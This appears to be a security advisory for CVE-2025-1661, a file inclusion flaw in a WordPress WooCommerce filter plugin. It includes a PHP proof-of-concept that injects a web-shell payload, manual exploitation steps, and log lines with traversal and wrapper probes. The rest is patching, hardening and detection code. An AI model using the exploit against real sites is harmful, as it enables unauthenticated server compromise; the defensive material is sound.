WordPress, Local File Inclusion, CVE-2025-1661 (Critical)

The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion (LFI) in all versions up to and including 1.3.6.5. The flaw sits in the ‘template’ parameter of the `woof_text_search` AJAX action, which is reachable through admin-ajax.php without authentication and is used to select a file to include. An unauthenticated attacker who controls that parameter can make the server include and execute arbitrary files already present on the host, which amounts to arbitrary code execution. The impact ranges from bypassing access controls and exposing sensitive data to full server compromise, and it is worst where the attacker can also upload seemingly harmless files, such as images with embedded PHP code, and then include them.
The vulnerability is particularly dangerous because it requires no authentication: any remote client that can reach admin-ajax.php can attempt it, and the affected action name is the same on every store running the plugin, so mass scanning is cheap. Its CVSS score places it in the Critical band. Successful exploitation runs PHP with the privileges of the web server user, from which an attacker can read configuration and database credentials, plant a persistent backdoor, or pivot further into the host.

DailyCVE Form:

Platform: WordPress
Version: <= 1.3.6.5
Vulnerability: Local File Inclusion
Severity: Critical
Date: 03/11/2025

What Undercode Say:

Exploitation:

1. Exploit Code Example:

<?php
// Proof-of-concept request against the woof_text_search AJAX action.
// The template parameter names php://input, so the POST body is what the
// vulnerable include() reads back and executes. This only works when the
// target has allow_url_include=On (off by default) and passes the parameter
// to include() without prepending a directory or appending an extension.
$url = "http://target-site.com/wp-admin/admin-ajax.php";
$params = array(
    'action'   => 'woof_text_search',
    'template' => 'php://input',
);
// Single quotes: the $_GET reference must reach the server verbatim,
// not be interpolated on the attacker's machine.
$payload = '<?php system($_GET["bash"]); ?>';
$context = stream_context_create(array(
    'http' => array(
        'method'        => 'POST',
        'header'        => "Content-Type: application/x-www-form-urlencoded\r\n",
        'content'       => $payload,
        'ignore_errors' => true, // return the body even on a 4xx/5xx status
    ),
));
$response = file_get_contents($url . '?' . http_build_query($params), false, $context);
echo $response;

This script sends the PHP payload as the POST body and names php://input as the template, so the vulnerable include() reads the body back and executes it. Two conditions must hold: the plugin must hand the parameter to include() unmodified, and the target's PHP must have allow_url_include enabled (it is off by default, and php://input cannot be included without it). On a default install the same flaw is more commonly exercised through a file already on disk, such as an uploaded image with PHP inside it, or used read-only through the php://filter wrapper, which is not subject to allow_url_include.

2. Manual Exploit Steps:

  • Identify a WordPress site running the vulnerable plugin at version 1.3.6.5 or earlier (plugin asset URLs under wp-content/plugins/ and the plugin's readme.txt usually reveal the version).
  • Craft a request to admin-ajax.php with action=woof_text_search and the ‘template’ parameter pointing at a file the attacker controls or wants executed.
  • Send it with `curl` or browser developer tools, then confirm that the included file's output appears in the response.

Protection:

1. Patch Application:

  • Update the HUSKY – Products Filter Professional for WooCommerce plugin to a version later than 1.3.6.5 (the vendor's fixed release), and confirm the installed version afterwards from the Plugins screen.

2. Server Hardening:

  • Restrict file upload permissions and disable PHP execution in upload directories.
  • Use a Web Application Firewall (WAF) to block malicious requests.

3. Code Review:

  • Audit plugin code for include/require calls whose path is built from request data.
  • Prefer an allowlist of known template names over sanitizing arbitrary paths: the request should select an entry from a fixed list, and the code should build the path itself and canonicalize it before including.
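
The following is an added illustration, not HUSKY's code: the vulnerable shape is assumed (a request parameter flowing straight into include()), and the template names, directory and function names are made up for the demo. It places the unsafe pattern beside a hardened version that replaces the path with an allowlist lookup and a canonicalization check.

```php
<?php
// Added illustration, not the plugin's code. The vulnerable shape is assumed:
// a request parameter flows straight into include(). The hardened version
// turns the parameter into an allowlist lookup and canonicalises the path.

/** The unsafe pattern: whatever the client sends is what gets included. */
function render_template_unsafe(array $request): void
{
    $template = $request['template'] ?? 'default';
    include $template;   // '../../wp-config.php', 'php://input', an uploaded .jpg with PHP inside
}

const ALLOWED_TEMPLATES = ['default', 'compact', 'grid'];   // assumed names

/** Map a requested template name to a file under $templateDir, or null. */
function resolve_template(string $requested, string $templateDir): ?string
{
    // 1. The client chooses a name from a fixed list, never a path or a wrapper.
    if (!in_array($requested, ALLOWED_TEMPLATES, true)) {
        return null;
    }
    // 2. We build the path; the client's string never reaches the filesystem call.
    $path = realpath($templateDir . '/' . $requested . '.php');
    $base = realpath($templateDir);
    // 3. Defence in depth: the resolved file must sit directly inside $templateDir
    //    (guards against a symlink or a future edit that relaxes step 1).
    if ($path === false || $base === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

/** The hardened handler: unknown names get a 400, nothing else is ever included. */
function render_template_safe(array $request, string $templateDir): void
{
    $path = resolve_template((string) ($request['template'] ?? 'default'), $templateDir);
    if ($path === null) {
        http_response_code(400);
        echo 'invalid template';
        return;
    }
    include $path;
}

// Self-check with a throwaway template directory (constructed for the demo).
$dir = sys_get_temp_dir() . '/lfi-demo-templates';
if (!is_dir($dir)) {
    mkdir($dir, 0700);
}
file_put_contents($dir . '/default.php', "<?php echo 'default template rendered', PHP_EOL;");

$probes = ['default', 'compact', '../../wp-config.php', 'php://input', 'default.php', '../uploads/2025/03/pic.jpg'];
foreach ($probes as $probe) {
    printf("%-28s -> %s\n", $probe, resolve_template($probe, $dir) ?? 'rejected');
}
```

Only `default` resolves; `compact` is allowlisted but has no file on disk, so realpath() fails and it is rejected too, which is the behaviour you want (an allowed name must still map to a real file under the template directory). Every traversal, wrapper or extension trick fails at the allowlist step before any filesystem call is made. In WordPress code, `sanitize_key()` is a reasonable first-pass filter on the incoming name, but it is not a substitute for the allowlist.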

4. Mitigation Commands:

  • Apache (.htaccess in wp-content/uploads): `php_admin_flag` is only accepted in the main server or virtual-host configuration, not in .htaccess, and `php_flag engine off` has no effect under PHP-FPM. Denying the files outright works in both setups:

      <FilesMatch "\.(php|phtml|phar)$">
          Require all denied
      </FilesMatch>

  • Nginx: scope the rule to the uploads path and place it before the generic PHP handler, because the first matching regex location wins:

      location ~* ^/wp-content/uploads/.*\.php$ { deny all; }

  • Caveat: these rules stop direct requests for PHP files in the uploads directory (a dropped web shell). They do not stop include() inside the vulnerable handler from executing PHP embedded in an uploaded file, because an include never passes through the web server's handler mapping; only the plugin update closes that path.

5. Monitoring:

  • Enable logging for AJAX requests and monitor for unusual patterns, in particular `action=woof_text_search` requests whose template value contains `..`, an absolute path, or a stream wrapper such as `php://`. Note that admin-ajax.php calls are normally POST requests, so the parameters are not in the web server's access log; capture them with a WAF audit log or an early-priority hook on `wp_ajax_nopriv_woof_text_search`.
  • Use intrusion detection systems (IDS) to flag potential exploitation attempts.
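
As an added detection example (not from the advisory), the script below scans combined-format access-log lines for `woof_text_search` requests whose template parameter looks like a file-inclusion attempt. The log lines are constructed for the demo; the rule names and thresholds are the author's choices, not anything the plugin or NVD publishes.

```php
<?php
// Added detection example, not part of the advisory. Scans combined-format
// access-log lines for woof_text_search requests whose template parameter
// looks like a file-inclusion attempt. The sample log lines are constructed.

/** Return the name of the first rule the template value trips, or null. */
function suspicious_template(string $template): ?string
{
    $t = rawurldecode($template);   // second decode catches %252e%252e-style double encoding
    $rules = [
        'null byte'      => '~\x00~',
        'traversal'      => '~(^|[\\\\/])\.\.([\\\\/]|$)~',
        'absolute path'  => '~^/~',
        'stream wrapper' => '~^[a-z][a-z0-9+.-]*:~i',   // php:, data:, file:, phar:, expect:, also C:\
        'uploads dir'    => '~wp-content/uploads~i',
    ];
    foreach ($rules as $name => $re) {
        if (preg_match($re, $t) === 1) {
            return $name;
        }
    }
    return null;
}

/** Parse one combined-format line into method and query parameters, or null. */
function parse_request(string $line): ?array
{
    if (preg_match('~"([A-Z]+) (\S+) HTTP/[\d.]+"~', $line, $m) !== 1) {
        return null;
    }
    $query  = parse_url($m[2], PHP_URL_QUERY);
    $params = [];
    if (is_string($query)) {
        parse_str($query, $params);   // parse_str URL-decodes once
    }
    return ['method' => $m[1], 'params' => $params];
}

/** One finding per suspicious line: line number, rule tripped, decoded template. */
function scan_access_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $i => $line) {
        $req = parse_request($line);
        if ($req === null) {
            continue;
        }
        $p = $req['params'];
        if (($p['action'] ?? null) !== 'woof_text_search' || !isset($p['template'])) {
            continue;
        }
        if (!is_string($p['template'])) {   // template[]=... is itself abnormal
            $findings[] = ['line' => $i + 1, 'rule' => 'non-scalar template', 'template' => ''];
            continue;
        }
        $rule = suspicious_template($p['template']);
        if ($rule !== null) {
            $findings[] = ['line' => $i + 1, 'rule' => $rule, 'template' => rawurldecode($p['template'])];
        }
    }
    return $findings;
}

// Constructed sample: three probes, one benign request, one POST whose body is not logged.
$sample = [
    '203.0.113.5 - - [11/Mar/2025:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=woof_text_search&template=../../../../etc/passwd HTTP/1.1" 200 1234 "-" "curl/8.0"',
    '203.0.113.5 - - [11/Mar/2025:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=woof_text_search&template=php://input HTTP/1.1" 200 120 "-" "curl/8.0"',
    '198.51.100.7 - - [11/Mar/2025:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=woof_text_search&template=%2e%2e%2fwp-content%2fuploads%2f2025%2f03%2fpic.jpg HTTP/1.1" 200 99 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [11/Mar/2025:10:00:04 +0000] "GET /wp-admin/admin-ajax.php?action=woof_text_search&template=default HTTP/1.1" 200 560 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [11/Mar/2025:10:00:05 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 560 "-" "Mozilla/5.0"',
];

foreach (scan_access_log($sample) as $f) {
    printf("line %d: %-16s template=%s\n", $f['line'], $f['rule'], $f['template']);
}
```

Lines 1 to 3 are reported (traversal, stream wrapper, and the percent-encoded traversal that decodes to a path into wp-content/uploads); line 4 is clean; line 5 is the realistic case that this approach cannot see, because the parameters travel in a POST body that the access log does not record. For those, feed the same `suspicious_template()` check the parameter values from a WAF audit log or from a logging callback registered on `wp_ajax_nopriv_woof_text_search` at a priority lower than the plugin's own handler.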

6. Backup:

  • Regularly back up the WordPress site and database to ensure quick recovery in case of compromise.

By following these steps, administrators can mitigate the risk posed by CVE-2025-1661 and protect their WordPress installations from exploitation.

References:

NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2025-1661